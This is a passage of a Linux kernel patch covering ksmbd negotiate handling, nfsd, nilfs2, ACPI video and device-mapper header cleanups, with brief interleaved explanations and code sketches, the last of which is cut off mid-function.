++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++static int init_smb1_rsp_hdr(struct ksmbd_work *work)
++{
++	struct smb_hdr *rsp_hdr = (struct smb_hdr *)work->response_buf;
++	struct smb_hdr *rcv_hdr = (struct smb_hdr *)work->request_buf;
++
++	/*
++	 * Remove 4 byte direct TCP header.
++	 */
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(sizeof(struct smb_hdr) - 4);
++
++	rsp_hdr->Command = SMB_COM_NEGOTIATE;
++	*(__le32 *)rsp_hdr->Protocol = SMB1_PROTO_NUMBER;
++	rsp_hdr->Flags = SMBFLG_RESPONSE;
++	rsp_hdr->Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
++		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
++	rsp_hdr->Pid = rcv_hdr->Pid;
++	rsp_hdr->Mid = rcv_hdr->Mid;
++	return 0;
++}
++
++/**
++ * smb1_check_user_session() - check for valid session for a user
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++static int smb1_check_user_session(struct ksmbd_work *work)
++{
++	unsigned int cmd = work->conn->ops->get_cmd_val(work);
++
++	if (cmd == SMB_COM_NEGOTIATE_EX)
+ 		return 0;
+ 
+-	init_smb3_11_server(conn);
++	return -EINVAL;
++}
++
++/**
++ * smb1_allocate_rsp_buf() - allocate response buffer for a command
++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -ENOMEM
++ */
++static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
++{
++	work->response_buf = kmalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
++			GFP_KERNEL | __GFP_ZERO);
++	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++
++	if (!work->response_buf) {
++		pr_err("Failed to allocate %u bytes buffer\n",
++				MAX_CIFS_SMALL_BUFFER_SIZE);
++		return -ENOMEM;
++	}
+ 
+-	if (conn->ops->get_cmd_val(work) != SMB_COM_NEGOTIATE)
+-		conn->need_neg = false;
+ 	return 0;
+ }
+ 
++static struct smb_version_ops smb1_server_ops = {
++	.get_cmd_val = get_smb1_cmd_val,
++	.init_rsp_hdr = init_smb1_rsp_hdr,
++	.allocate_rsp_buf = smb1_allocate_rsp_buf,
++	.check_user_session = smb1_check_user_session,
++};
++
++static int smb1_negotiate(struct ksmbd_work *work)
++{
++	return ksmbd_smb_negotiate_common(work, SMB_COM_NEGOTIATE);
++}
++
++static struct smb_version_cmds smb1_server_cmds[1] = {
++	[SMB_COM_NEGOTIATE_EX]	= { .proc = smb1_negotiate, },
++};
++
++static void init_smb1_server(struct ksmbd_conn *conn)
++{
++	conn->ops = &smb1_server_ops;
++	conn->cmds = smb1_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb1_server_cmds);
++}
++
++void ksmbd_init_smb_server(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	__le32 proto;
++
++	if (conn->need_neg == false)
++		return;
++
++	proto = *(__le32 *)((struct smb_hdr *)work->request_buf)->Protocol;
++	if (proto == SMB1_PROTO_NUMBER)
++		init_smb1_server(conn);
++	else
++		init_smb3_11_server(conn);
++}
++
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work, int info_level,
+ 				      struct ksmbd_file *dir,
+ 				      struct ksmbd_dir_info *d_info,
+@@ -444,20 +545,10 @@ static int smb_handle_negotiate(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
+ 
+-	/*
+-	 * Remove 4 byte direct TCP header, add 2 byte bcc and
+-	 * 2 byte DialectIndex.
+-	 */
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(sizeof(struct smb_hdr) - 4 + 2 + 2);
++	/* Add 2 byte bcc and 2 byte DialectIndex. */
++	inc_rfc1001_len(work->response_buf, 4);
+ 	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
+ 
+-	neg_rsp->hdr.Command = SMB_COM_NEGOTIATE;
+-	*(__le32 *)neg_rsp->hdr.Protocol = SMB1_PROTO_NUMBER;
+-	neg_rsp->hdr.Flags = SMBFLG_RESPONSE;
+-	neg_rsp->hdr.Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
+-		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
+-
+ 	neg_rsp->hdr.WordCount = 1;
+ 	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
+ 	neg_rsp->ByteCount = 0;
+@@ -473,24 +564,13 @@ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+ 		ksmbd_negotiate_smb_dialect(work->request_buf);
+ 	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+ 
+-	if (command == SMB2_NEGOTIATE_HE) {
+-		struct smb2_hdr *smb2_hdr = smb2_get_msg(work->request_buf);
+-
+-		if (smb2_hdr->ProtocolId != SMB2_PROTO_NUMBER) {
+-			ksmbd_debug(SMB, "Downgrade to SMB1 negotiation\n");
+-			command = SMB_COM_NEGOTIATE;
+-		}
+-	}
+-
+ 	if (command == SMB2_NEGOTIATE_HE) {
+ 		ret = smb2_handle_negotiate(work);
+-		init_smb2_neg_rsp(work);
+ 		return ret;
+ 	}
+ 
+ 	if (command == SMB_COM_NEGOTIATE) {
+ 		if (__smb2_negotiate(conn)) {
+-			conn->need_neg = true;
+ 			init_smb3_11_server(conn);
+ 			init_smb2_neg_rsp(work);
+ 			ksmbd_debug(SMB, "Upgrade to SMB2 negotiation\n");
+diff --git a/fs/ksmbd/smb_common.h b/fs/ksmbd/smb_common.h
+index c1f3006792ff6..78c44978a906a 100644
+--- a/fs/ksmbd/smb_common.h
++++ b/fs/ksmbd/smb_common.h
+@@ -427,7 +427,7 @@ bool ksmbd_smb_request(struct ksmbd_conn *conn);
+ 
+ int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count);
+ 
+-int ksmbd_init_smb_server(struct ksmbd_work *work);
++void ksmbd_init_smb_server(struct ksmbd_work *work);
+ 
+ struct ksmbd_kstat;
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work,
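
The ksmbd rework above replaces the per-command negotiate downgrade dance with a one-time dispatch: ksmbd_init_smb_server() sniffs the 4-byte protocol id at the start of the request header and installs either the SMB1 negotiate-only stub or the SMB2/3 ops. SMB1_PROTO_NUMBER is the classic 0xFF 'S' 'M' 'B' marker, so the sniffing amounts to the following userspace sketch (the 0xFE marker for SMB2 is shown for contrast):

    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
    	static const unsigned char smb1_proto[4] = { 0xff, 'S', 'M', 'B' };
    	unsigned char request[4] = { 0xfe, 'S', 'M', 'B' };	/* SMB2 marker */

    	if (!memcmp(request, smb1_proto, sizeof(smb1_proto)))
    		puts("install SMB1 negotiate-only stub");
    	else
    		puts("install SMB2/3 server ops");
    	return 0;
    }
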
+diff --git a/fs/namespace.c b/fs/namespace.c
+index df137ba19d375..e04a9e9e3f14f 100644
+--- a/fs/namespace.c
++++ b/fs/namespace.c
+@@ -4180,9 +4180,9 @@ out:
+ 	unlock_mount_hash();
+ 
+ 	if (kattr->propagation) {
+-		namespace_unlock();
+ 		if (err)
+ 			cleanup_group_ids(mnt, NULL);
++		namespace_unlock();
+ 	}
+ 
+ 	return err;
+diff --git a/fs/nfsd/blocklayout.c b/fs/nfsd/blocklayout.c
+index b6d01d51a7465..e7e6e78d965db 100644
+--- a/fs/nfsd/blocklayout.c
++++ b/fs/nfsd/blocklayout.c
+@@ -296,6 +296,7 @@ nfsd4_block_get_device_info_scsi(struct super_block *sb,
+ 
+ out_free_dev:
+ 	kfree(dev);
++	gdp->gd_device = NULL;
+ 	return ret;
+ }
+ 
+diff --git a/fs/nfsd/nfs4callback.c b/fs/nfsd/nfs4callback.c
+index 6253cbe5f81b4..39989c14c8a1e 100644
+--- a/fs/nfsd/nfs4callback.c
++++ b/fs/nfsd/nfs4callback.c
+@@ -874,8 +874,8 @@ static const struct cred *get_backchannel_cred(struct nfs4_client *clp, struct r
+ 		if (!kcred)
+ 			return NULL;
+ 
+-		kcred->uid = ses->se_cb_sec.uid;
+-		kcred->gid = ses->se_cb_sec.gid;
++		kcred->fsuid = ses->se_cb_sec.uid;
++		kcred->fsgid = ses->se_cb_sec.gid;
+ 		return kcred;
+ 	}
+ }
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 8377e14b8fba9..8f5b41dc07734 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -2417,10 +2417,12 @@ nfsd4_decode_compound(struct nfsd4_compoundargs *argp)
+ 	for (i = 0; i < argp->opcnt; i++) {
+ 		op = &argp->ops[i];
+ 		op->replay = NULL;
++		op->opdesc = NULL;
+ 
+ 		if (xdr_stream_decode_u32(argp->xdr, &op->opnum) < 0)
+ 			return false;
+ 		if (nfsd4_opnum_in_range(argp, op)) {
++			op->opdesc = OPDESC(op);
+ 			op->status = nfsd4_dec_ops[op->opnum](argp, &op->u);
+ 			if (op->status != nfs_ok)
+ 				trace_nfsd_compound_decode_err(argp->rqstp,
+@@ -2431,7 +2433,7 @@ nfsd4_decode_compound(struct nfsd4_compoundargs *argp)
+ 			op->opnum = OP_ILLEGAL;
+ 			op->status = nfserr_op_illegal;
+ 		}
+-		op->opdesc = OPDESC(op);
++
+ 		/*
+ 		 * We'll try to cache the result in the DRC if any one
+ 		 * op in the compound wants to be cached:
+@@ -5351,10 +5353,8 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	__be32 *p;
+ 
+ 	p = xdr_reserve_space(xdr, 8);
+-	if (!p) {
+-		WARN_ON_ONCE(1);
+-		return;
+-	}
++	if (!p)
++		goto release;
+ 	*p++ = cpu_to_be32(op->opnum);
+ 	post_err_offset = xdr->buf->len;
+ 
+@@ -5369,8 +5369,6 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	op->status = encoder(resp, op->status, &op->u);
+ 	if (op->status)
+ 		trace_nfsd_compound_encode_err(rqstp, op->opnum, op->status);
+-	if (opdesc && opdesc->op_release)
+-		opdesc->op_release(&op->u);
+ 	xdr_commit_encode(xdr);
+ 
+ 	/* nfsd4_check_resp_size guarantees enough room for error status */
+@@ -5411,6 +5409,9 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	}
+ status:
+ 	*p = op->status;
++release:
++	if (opdesc && opdesc->op_release)
++		opdesc->op_release(&op->u);
+ }
+ 
+ /* 
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 3335ef3529155..63d96a1733b2a 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2607,11 +2607,10 @@ static int nilfs_segctor_thread(void *arg)
+ 	goto loop;
+ 
+  end_thread:
+-	spin_unlock(&sci->sc_state_lock);
+-
+ 	/* end sync. */
+ 	sci->sc_task = NULL;
+ 	wake_up(&sci->sc_wait_task); /* for nilfs_segctor_kill_thread() */
++	spin_unlock(&sci->sc_state_lock);
+ 	return 0;
+ }
+ 
+diff --git a/fs/nilfs2/super.c b/fs/nilfs2/super.c
+index 1422b8ba24ed6..77f1e5778d1c8 100644
+--- a/fs/nilfs2/super.c
++++ b/fs/nilfs2/super.c
+@@ -482,6 +482,7 @@ static void nilfs_put_super(struct super_block *sb)
+ 		up_write(&nilfs->ns_sem);
+ 	}
+ 
++	nilfs_sysfs_delete_device_group(nilfs);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_dat);
+@@ -1105,6 +1106,7 @@ nilfs_fill_super(struct super_block *sb, void *data, int silent)
+ 	nilfs_put_root(fsroot);
+ 
+  failed_unload:
++	nilfs_sysfs_delete_device_group(nilfs);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_dat);
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 3a4c9c150cbf5..2894152a6b25c 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -87,7 +87,6 @@ void destroy_nilfs(struct the_nilfs *nilfs)
+ {
+ 	might_sleep();
+ 	if (nilfs_init(nilfs)) {
+-		nilfs_sysfs_delete_device_group(nilfs);
+ 		brelse(nilfs->ns_sbh[0]);
+ 		brelse(nilfs->ns_sbh[1]);
+ 	}
+@@ -305,6 +304,10 @@ int load_nilfs(struct the_nilfs *nilfs, struct super_block *sb)
+ 		goto failed;
+ 	}
+ 
++	err = nilfs_sysfs_create_device_group(sb);
++	if (unlikely(err))
++		goto sysfs_error;
++
+ 	if (valid_fs)
+ 		goto skip_recovery;
+ 
+@@ -366,6 +369,9 @@ int load_nilfs(struct the_nilfs *nilfs, struct super_block *sb)
+ 	goto failed;
+ 
+  failed_unload:
++	nilfs_sysfs_delete_device_group(nilfs);
++
++ sysfs_error:
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_dat);
+@@ -697,10 +703,6 @@ int init_nilfs(struct the_nilfs *nilfs, struct super_block *sb, char *data)
+ 	if (err)
+ 		goto failed_sbh;
+ 
+-	err = nilfs_sysfs_create_device_group(sb);
+-	if (err)
+-		goto failed_sbh;
+-
+ 	set_nilfs_init(nilfs);
+ 	err = 0;
+  out:
+diff --git a/include/acpi/video.h b/include/acpi/video.h
+index 8ed9bec03e534..ff5a8da5d8832 100644
+--- a/include/acpi/video.h
++++ b/include/acpi/video.h
+@@ -59,8 +59,6 @@ extern void acpi_video_unregister(void);
+ extern void acpi_video_register_backlight(void);
+ extern int acpi_video_get_edid(struct acpi_device *device, int type,
+ 			       int device_id, void **edid);
+-extern enum acpi_backlight_type acpi_video_get_backlight_type(void);
+-extern bool acpi_video_backlight_use_native(void);
+ /*
+  * Note: The value returned by acpi_video_handles_brightness_key_presses()
+  * may change over time and should not be cached.
+@@ -69,6 +67,19 @@ extern bool acpi_video_handles_brightness_key_presses(void);
+ extern int acpi_video_get_levels(struct acpi_device *device,
+ 				 struct acpi_video_device_brightness **dev_br,
+ 				 int *pmax_level);
++
++extern enum acpi_backlight_type __acpi_video_get_backlight_type(bool native,
++								bool *auto_detect);
++
++static inline enum acpi_backlight_type acpi_video_get_backlight_type(void)
++{
++	return __acpi_video_get_backlight_type(false, NULL);
++}
++
++static inline bool acpi_video_backlight_use_native(void)
++{
++	return __acpi_video_get_backlight_type(true, NULL) == acpi_backlight_native;
++}
+ #else
+ static inline void acpi_video_report_nolcd(void) { return; };
+ static inline int acpi_video_register(void) { return -ENODEV; }
+diff --git a/include/drm/display/drm_dp_mst_helper.h b/include/drm/display/drm_dp_mst_helper.h
+index 6c0c3dc3d3aca..32c764fb9cb56 100644
+--- a/include/drm/display/drm_dp_mst_helper.h
++++ b/include/drm/display/drm_dp_mst_helper.h
+@@ -841,7 +841,8 @@ int drm_dp_add_payload_part2(struct drm_dp_mst_topology_mgr *mgr,
+ 			     struct drm_dp_mst_atomic_payload *payload);
+ void drm_dp_remove_payload(struct drm_dp_mst_topology_mgr *mgr,
+ 			   struct drm_dp_mst_topology_state *mst_state,
+-			   struct drm_dp_mst_atomic_payload *payload);
++			   const struct drm_dp_mst_atomic_payload *old_payload,
++			   struct drm_dp_mst_atomic_payload *new_payload);
+ 
+ int drm_dp_check_act_status(struct drm_dp_mst_topology_mgr *mgr);
+ 
+diff --git a/include/kvm/arm_pmu.h b/include/kvm/arm_pmu.h
+index c0b868ce6a8f2..96b192139a23a 100644
+--- a/include/kvm/arm_pmu.h
++++ b/include/kvm/arm_pmu.h
+@@ -11,7 +11,6 @@
+ #include <asm/perf_event.h>
+ 
+ #define ARMV8_PMU_CYCLE_IDX		(ARMV8_PMU_MAX_COUNTERS - 1)
+-#define ARMV8_PMU_MAX_COUNTER_PAIRS	((ARMV8_PMU_MAX_COUNTERS + 1) >> 1)
+ 
+ #ifdef CONFIG_HW_PERF_EVENTS
+ 
+@@ -29,7 +28,6 @@ struct kvm_pmu {
+ 	struct irq_work overflow_work;
+ 	struct kvm_pmu_events events;
+ 	struct kvm_pmc pmc[ARMV8_PMU_MAX_COUNTERS];
+-	DECLARE_BITMAP(chained, ARMV8_PMU_MAX_COUNTER_PAIRS);
+ 	int irq_num;
+ 	bool created;
+ 	bool irq_level;
+diff --git a/include/linux/device-mapper.h b/include/linux/device-mapper.h
+index 04c6acf7faaa5..201dd1ab7f1c6 100644
+--- a/include/linux/device-mapper.h
++++ b/include/linux/device-mapper.h
+@@ -87,10 +87,10 @@ typedef int (*dm_preresume_fn) (struct dm_target *ti);
+ typedef void (*dm_resume_fn) (struct dm_target *ti);
+ 
+ typedef void (*dm_status_fn) (struct dm_target *ti, status_type_t status_type,
+-			      unsigned status_flags, char *result, unsigned maxlen);
++			      unsigned int status_flags, char *result, unsigned int maxlen);
+ 
+-typedef int (*dm_message_fn) (struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen);
++typedef int (*dm_message_fn) (struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen);
+ 
+ typedef int (*dm_prepare_ioctl_fn) (struct dm_target *ti, struct block_device **bdev);
+ 
+@@ -187,7 +187,7 @@ struct target_type {
+ 	uint64_t features;
+ 	const char *name;
+ 	struct module *module;
+-	unsigned version[3];
++	unsigned int version[3];
+ 	dm_ctr_fn ctr;
+ 	dm_dtr_fn dtr;
+ 	dm_map_fn map;
+@@ -313,31 +313,31 @@ struct dm_target {
+ 	 * It is a responsibility of the target driver to remap these bios
+ 	 * to the real underlying devices.
+ 	 */
+-	unsigned num_flush_bios;
++	unsigned int num_flush_bios;
+ 
+ 	/*
+ 	 * The number of discard bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_discard_bios;
++	unsigned int num_discard_bios;
+ 
+ 	/*
+ 	 * The number of secure erase bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_secure_erase_bios;
++	unsigned int num_secure_erase_bios;
+ 
+ 	/*
+ 	 * The number of WRITE ZEROES bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_write_zeroes_bios;
++	unsigned int num_write_zeroes_bios;
+ 
+ 	/*
+ 	 * The minimum number of extra bytes allocated in each io for the
+ 	 * target to use.
+ 	 */
+-	unsigned per_io_data_size;
++	unsigned int per_io_data_size;
+ 
+ 	/* target specific data */
+ 	void *private;
+@@ -383,7 +383,7 @@ struct dm_target {
+ 
+ void *dm_per_bio_data(struct bio *bio, size_t data_size);
+ struct bio *dm_bio_from_per_bio_data(void *data, size_t data_size);
+-unsigned dm_bio_get_target_bio_nr(const struct bio *bio);
++unsigned int dm_bio_get_target_bio_nr(const struct bio *bio);
+ 
+ u64 dm_start_time_ns_from_clone(struct bio *bio);
+ 
+@@ -394,7 +394,7 @@ void dm_unregister_target(struct target_type *t);
+  * Target argument parsing.
+  */
+ struct dm_arg_set {
+-	unsigned argc;
++	unsigned int argc;
+ 	char **argv;
+ };
+ 
+@@ -403,8 +403,8 @@ struct dm_arg_set {
+  * the error message to use if the number is found to be outside that range.
+  */
+ struct dm_arg {
+-	unsigned min;
+-	unsigned max;
++	unsigned int min;
++	unsigned int max;
+ 	char *error;
+ };
+ 
+@@ -413,7 +413,7 @@ struct dm_arg {
+  * returning -EINVAL and setting *error.
+  */
+ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		unsigned *value, char **error);
++		unsigned int *value, char **error);
+ 
+ /*
+  * Process the next argument as the start of a group containing between
+@@ -421,7 +421,7 @@ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+  * *num_args or, if invalid, return -EINVAL and set *error.
+  */
+ int dm_read_arg_group(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		      unsigned *num_args, char **error);
++		      unsigned int *num_args, char **error);
+ 
+ /*
+  * Return the current argument and shift to the next.
+@@ -431,7 +431,7 @@ const char *dm_shift_arg(struct dm_arg_set *as);
+ /*
+  * Move through num_args arguments.
+  */
+-void dm_consume_args(struct dm_arg_set *as, unsigned num_args);
++void dm_consume_args(struct dm_arg_set *as, unsigned int num_args);
+ 
+ /*-----------------------------------------------------------------
+  * Functions for creating and manipulating mapped devices.
+@@ -461,7 +461,7 @@ void *dm_get_mdptr(struct mapped_device *md);
+ /*
+  * A device can still be used while suspended, but I/O is deferred.
+  */
+-int dm_suspend(struct mapped_device *md, unsigned suspend_flags);
++int dm_suspend(struct mapped_device *md, unsigned int suspend_flags);
+ int dm_resume(struct mapped_device *md);
+ 
+ /*
+@@ -481,7 +481,7 @@ struct gendisk *dm_disk(struct mapped_device *md);
+ int dm_suspended(struct dm_target *ti);
+ int dm_post_suspending(struct dm_target *ti);
+ int dm_noflush_suspending(struct dm_target *ti);
+-void dm_accept_partial_bio(struct bio *bio, unsigned n_sectors);
++void dm_accept_partial_bio(struct bio *bio, unsigned int n_sectors);
+ void dm_submit_bio_remap(struct bio *clone, struct bio *tgt_clone);
+ union map_info *dm_get_rq_mapinfo(struct request *rq);
+ 
+@@ -525,7 +525,7 @@ int dm_set_geometry(struct mapped_device *md, struct hd_geometry *geo);
+  * First create an empty table.
+  */
+ int dm_table_create(struct dm_table **result, fmode_t mode,
+-		    unsigned num_targets, struct mapped_device *md);
++		    unsigned int num_targets, struct mapped_device *md);
+ 
+ /*
+  * Then call this once for each target.
+diff --git a/include/linux/dm-bufio.h b/include/linux/dm-bufio.h
+index 15d9e15ca830d..1262d92ab88fc 100644
+--- a/include/linux/dm-bufio.h
++++ b/include/linux/dm-bufio.h
+@@ -26,8 +26,8 @@ struct dm_buffer;
+  * Create a buffered IO cache on a given device
+  */
+ struct dm_bufio_client *
+-dm_bufio_client_create(struct block_device *bdev, unsigned block_size,
+-		       unsigned reserved_buffers, unsigned aux_size,
++dm_bufio_client_create(struct block_device *bdev, unsigned int block_size,
++		       unsigned int reserved_buffers, unsigned int aux_size,
+ 		       void (*alloc_callback)(struct dm_buffer *),
+ 		       void (*write_callback)(struct dm_buffer *),
+ 		       unsigned int flags);
+@@ -81,7 +81,7 @@ void *dm_bufio_new(struct dm_bufio_client *c, sector_t block,
+  * I/O to finish.
+  */
+ void dm_bufio_prefetch(struct dm_bufio_client *c,
+-		       sector_t block, unsigned n_blocks);
++		       sector_t block, unsigned int n_blocks);
+ 
+ /*
+  * Release a reference obtained with dm_bufio_{read,get,new}. The data
+@@ -106,7 +106,7 @@ void dm_bufio_mark_buffer_dirty(struct dm_buffer *b);
+  * write the specified part of the buffer or it may write a larger superset.
+  */
+ void dm_bufio_mark_partial_buffer_dirty(struct dm_buffer *b,
+-					unsigned start, unsigned end);
++					unsigned int start, unsigned int end);
+ 
+ /*
+  * Initiate writing of dirty buffers, without waiting for completion.
+@@ -152,9 +152,9 @@ void dm_bufio_forget_buffers(struct dm_bufio_client *c, sector_t block, sector_t
+ /*
+  * Set the minimum number of buffers before cleanup happens.
+  */
+-void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned n);
++void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned int n);
+ 
+-unsigned dm_bufio_get_block_size(struct dm_bufio_client *c);
++unsigned int dm_bufio_get_block_size(struct dm_bufio_client *c);
+ sector_t dm_bufio_get_device_size(struct dm_bufio_client *c);
+ struct dm_io_client *dm_bufio_get_dm_io_client(struct dm_bufio_client *c);
+ sector_t dm_bufio_get_block_number(struct dm_buffer *b);
+diff --git a/include/linux/dm-dirty-log.h b/include/linux/dm-dirty-log.h
+index 7084503c3405f..843c857f07b0d 100644
+--- a/include/linux/dm-dirty-log.h
++++ b/include/linux/dm-dirty-log.h
+@@ -33,7 +33,7 @@ struct dm_dirty_log_type {
+ 	struct list_head list;
+ 
+ 	int (*ctr)(struct dm_dirty_log *log, struct dm_target *ti,
+-		   unsigned argc, char **argv);
++		   unsigned int argc, char **argv);
+ 	void (*dtr)(struct dm_dirty_log *log);
+ 
+ 	/*
+@@ -116,7 +116,7 @@ struct dm_dirty_log_type {
+ 	 * Support function for mirror status requests.
+ 	 */
+ 	int (*status)(struct dm_dirty_log *log, status_type_t status_type,
+-		      char *result, unsigned maxlen);
++		      char *result, unsigned int maxlen);
+ 
+ 	/*
+ 	 * is_remote_recovering is necessary for cluster mirroring. It provides
+@@ -139,7 +139,7 @@ int dm_dirty_log_type_unregister(struct dm_dirty_log_type *type);
+ struct dm_dirty_log *dm_dirty_log_create(const char *type_name,
+ 			struct dm_target *ti,
+ 			int (*flush_callback_fn)(struct dm_target *ti),
+-			unsigned argc, char **argv);
++			unsigned int argc, char **argv);
+ void dm_dirty_log_destroy(struct dm_dirty_log *log);
+ 
+ #endif	/* __KERNEL__ */
+diff --git a/include/linux/dm-io.h b/include/linux/dm-io.h
+index 8e1c4ab5df043..92e7abfe04f92 100644
+--- a/include/linux/dm-io.h
++++ b/include/linux/dm-io.h
+@@ -26,7 +26,7 @@ struct page_list {
+ 	struct page *page;
+ };
+ 
+-typedef void (*io_notify_fn)(unsigned long error, void *context);
++typedef void (*io_notify_fn)(unsigned long error, void *context);
+ 
+ enum dm_io_mem_type {
+ 	DM_IO_PAGE_LIST,/* Page list */
+@@ -38,7 +38,7 @@ enum dm_io_mem_type {
+ struct dm_io_memory {
+ 	enum dm_io_mem_type type;
+ 
+-	unsigned offset;
++	unsigned int offset;
+ 
+ 	union {
+ 		struct page_list *pl;
+@@ -78,8 +78,8 @@ void dm_io_client_destroy(struct dm_io_client *client);
+  * Each bit in the optional 'sync_error_bits' bitset indicates whether an
+  * error occurred doing io to the corresponding region.
+  */
+-int dm_io(struct dm_io_request *io_req, unsigned num_regions,
+-	  struct dm_io_region *region, unsigned long *sync_error_bits);
++int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
++	  struct dm_io_region *region, unsigned long *sync_error_bits);
+ 
+ #endif	/* __KERNEL__ */
+ #endif	/* _LINUX_DM_IO_H */
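
For orientation, a minimal sketch of a synchronous dm_io() call against the interface above; client creation and error handling are omitted and this fragment is not part of the patch:

/* Sketch only: one synchronous READ of a single region into a kernel
 * buffer. Leaving notify.fn NULL makes dm_io() block until completion;
 * the final NULL skips the per-region sync_error_bits bitset. */
static int read_one_region(struct dm_io_client *client,
			   struct block_device *bdev, void *buf,
			   sector_t start, sector_t count)
{
	struct dm_io_region region = {
		.bdev   = bdev,
		.sector = start,
		.count  = count,
	};
	struct dm_io_request req = {
		.bi_opf       = REQ_OP_READ,
		.mem.type     = DM_IO_KMEM,
		.mem.ptr.addr = buf,
		.client       = client,
	};

	return dm_io(&req, 1, &region, NULL);
}
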
+diff --git a/include/linux/dm-kcopyd.h b/include/linux/dm-kcopyd.h
+index c1707ee5b5408..68c412b31b788 100644
+--- a/include/linux/dm-kcopyd.h
++++ b/include/linux/dm-kcopyd.h
+@@ -23,11 +23,11 @@
+ #define DM_KCOPYD_WRITE_SEQ    2
+ 
+ struct dm_kcopyd_throttle {
+-	unsigned throttle;
+-	unsigned num_io_jobs;
+-	unsigned io_period;
+-	unsigned total_period;
+-	unsigned last_jiffies;
++	unsigned int throttle;
++	unsigned int num_io_jobs;
++	unsigned int io_period;
++	unsigned int total_period;
++	unsigned int last_jiffies;
+ };
+ 
+ /*
+@@ -60,12 +60,12 @@ void dm_kcopyd_client_flush(struct dm_kcopyd_client *kc);
+  * read_err is a boolean,
+  * write_err is a bitset, with 1 bit for each destination region
+  */
+-typedef void (*dm_kcopyd_notify_fn)(int read_err, unsigned long write_err,
++typedef void (*dm_kcopyd_notify_fn)(int read_err, unsigned long write_err,
+ 				    void *context);
+ 
+ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context);
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context);
+ 
+ /*
+  * Prepare a callback and submit it via the kcopyd thread.
+@@ -80,11 +80,11 @@ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+  */
+ void *dm_kcopyd_prepare_callback(struct dm_kcopyd_client *kc,
+ 				 dm_kcopyd_notify_fn fn, void *context);
+-void dm_kcopyd_do_callback(void *job, int read_err, unsigned long write_err);
++void dm_kcopyd_do_callback(void *job, int read_err, unsigned long write_err);
+ 
+ void dm_kcopyd_zero(struct dm_kcopyd_client *kc,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context);
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context);
+ 
+ #endif	/* __KERNEL__ */
+ #endif	/* _LINUX_DM_KCOPYD_H */
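
As a usage sketch of the callback contract documented above (read_err is a boolean, write_err carries one bit per destination) — hedged, outside the patch:

/* Sketch only: copy one source region to one destination and wait.
 * With a single destination, only bit 0 of write_err is meaningful. */
static void copy_done(int read_err, unsigned long write_err, void *context)
{
	struct completion *done = context;

	if (read_err || write_err)
		pr_warn("kcopyd copy failed: read_err=%d write_err=%#lx\n",
			read_err, write_err);
	complete(done);
}

static void copy_one(struct dm_kcopyd_client *kc,
		     struct dm_io_region *from, struct dm_io_region *to)
{
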